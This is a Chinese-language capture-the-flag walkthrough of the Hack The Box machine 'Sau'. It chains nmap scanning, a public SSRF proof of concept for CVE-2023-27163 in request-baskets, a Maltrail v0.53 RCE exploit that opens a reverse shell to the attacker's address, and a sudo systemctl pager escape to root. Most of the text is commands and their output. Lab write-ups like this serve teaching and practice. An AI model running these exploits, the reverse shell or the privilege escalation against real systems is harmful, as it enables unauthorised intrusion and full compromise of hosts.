主要知识点

• CVE-2023-27163漏洞利用
• systemd提权

具体步骤

执行nmap扫描，可以先看一下55555端口
 

Nmap scan report for 10.10.11.224
Host is up (0.58s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

打开页面后，在左下角找到了软件信息和版本

 

搜索相关信息会得到很多exp,这里使用了GitHub - entr0pie/CVE-2023-27163: Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1),简单研究了一下，这个CVE是 允许通过request-baskets来把请求转发到某处，这里考虑把请求转发到服务端的80端口(这里的127.0.01实际上会出现在requests-basket entry的配置里，也就是会指向服务器自身)

C:\home\kali\Documents\HTB\Sau\CVE-2023-27163-main> ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80              
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "fduqgd" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/fduqgd now makes the server request to http://127.0.0.1:80.
> Authorization: hCArIkTJn2301CJdww6xq016yCcKlEucytDR3lL3wKGk

打开http://10.10.11.224:55555/fduqgd 后会得到Maltrail v0.53的页面

而该版本的Maltrail有RCE漏洞https://github.com/spookier/Maltrail-v0.53-Exploit

下载后执行如下命令，则会创建reverse shell

python exploit.py 10.10.16.19 80 http://10.10.11.224:55555/fduqgd

执行sudo -l会发现线索 /usr/bin/systemctl

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

在这里参考一下Sudo Systemctl Privilege Escalation | Exploit Notes会成功提权
 

sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@sau:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)